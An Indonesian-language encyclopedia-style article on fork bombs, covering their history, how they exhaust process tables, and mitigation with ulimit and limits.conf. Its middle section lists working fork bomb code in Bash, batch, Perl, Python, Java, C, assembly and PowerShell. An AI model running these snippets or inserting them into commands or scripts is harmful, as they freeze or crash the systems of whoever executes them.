Dalam komputasi, fork bomb, (juga disebut virus kelinci atau wabbit) adalah denial-of-service attack dimana proses terus bereplikasi sendiri untuk menguras sumber daya sistem yang tersedia, memperlambat atau membekukan sistem karena kekurangan sumber daya.
Sekitar tahun 1978, varian awal dari sebuah bom garpu yang disebut wabbit dilaporkan berjalan pada sebuah System/360. Serangan itu mungkin telah diturunkan dari serangan serupa yang sering disebut RABBITS. Serangan ini dilaporkan dari tahun 1969 pada sebuah Burroughs 5500 di University of Washington.[1]
Bom garpu beroperasi baik dengan memakan waktu CPU dalam proses forking, dan dengan menjenuhkan proses table sistem operasi.[2][3] dasar pengoperasian bom garpu adalah infinite loop yang berulang kali meluncurkan proses yang sama.
Pada sistem operasi serupa-Unix bom garpu umumnya ditulis menggunakan fork system call. Sebagai proses bercabang yang juga merupakan salinan dari program pertama, setelah mereka melanjutkan eksekusi dari alamat berikutnya di frame pointer, mereka juga berusaha untuk membuat salinan dari diri mereka sendiri; ini memiliki efek yang menyebabkan pertumbuhan eksponensial dalam proses. Sistem Unix modern umumnya menggunakan copy-on-write ketika melakukan forking proses-proses baru,[4] sebuah bom garpu umumnya tidak akan membuat jenuh sistem memori.
Sistem operasi Microsoft Windows tidak memiliki fungsi setara dengan Unix fork system call;[5] oleh karena itu bom garpu pada suatu sistem operasi harus membuat sebuah proses baru bukan forking dari yang sudah ada.
Artikel ini mungkin mengandung riset asli. |
:(){ :|:& };:
Triknya adalah bahwa :
adalah sebuah nama fungsi — oleh karena itu serupa juga dengan bomb() { bomb | bomb & }; bomb
.
Sama seperti diatas tetapi di encode dengan shell script:
#!/bin/bash
./$0|./$0&
:s
start "" %0
goto s
Sama dengan diatas, tetapi lebih singkat:
%0|%0
Kombinasi dari dua perintah diatas(untuk mencocokan konsep):
:s
start "" %0
%0|%0
goto s
Sama dengan diatas, tetapi dilakukan di command line menggunakan ^ untuk menghindari:
echo %0^|%0 > forkbomb.bat
forkbomb.bat
Contoh inline shell menggunakan Perl interpreter:
perl -e "fork while fork" &
Kode dibawah dibuat menjadi file Python (.py
). Contoh kode Python interpreter:
import os
while 1:
os.fork()
public class ForkBomb
{
public static void main(String[] args)
{
while(true)
{
Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
}
}
}
#include <unistd.h>
int main(void)
{
while(1) {
fork(); /* malloc can be used in order to increase the data usage */
}
}
Kode di bawah ini dapat dijalankan di KolibriOS, karena KolibriOS dibuat menggunakan bahasa Assembly. Contoh kode Assembly interpreter:
section .text
global _start
_start:
mov eax,2 ;System call for forking
int 0x80 ;Call kernel
jmp _start
Kode dibawah dibuat menjadi file PowerShell Script (.ps1
). Contoh kode PowerShell interpreter:
while($true) {
Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:";
Invoke-Expression -Command 'while($true) {Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:"}';}
Karena modus operasi bom garpu sepenuhnya dikemas dengan menciptakan proses-proses baru, salah satu cara untuk mencegah bom garpu dari kerusakan parah yang mempengaruhi seluruh sistem yaitu dengan membatasi jumlah maksimum dari proses yang dapat dilakukan 1 pengguna. Di Linux, hal ini dapat dicapai dengan menggunakan utilitas ulimit; sebagai contoh, perintah ulimit -u 30
akan membatasi pengguna yang terkena dampak maksimum tiga puluh proses yang dimiliki.[6] Pada PAM-enabled system, batas ini juga bisa di set di /etc/security/limits.conf
,[7] dan pada FreeBSD, administrator sistem dapat menempatkan batas dalam /etc/login.conf
.[8]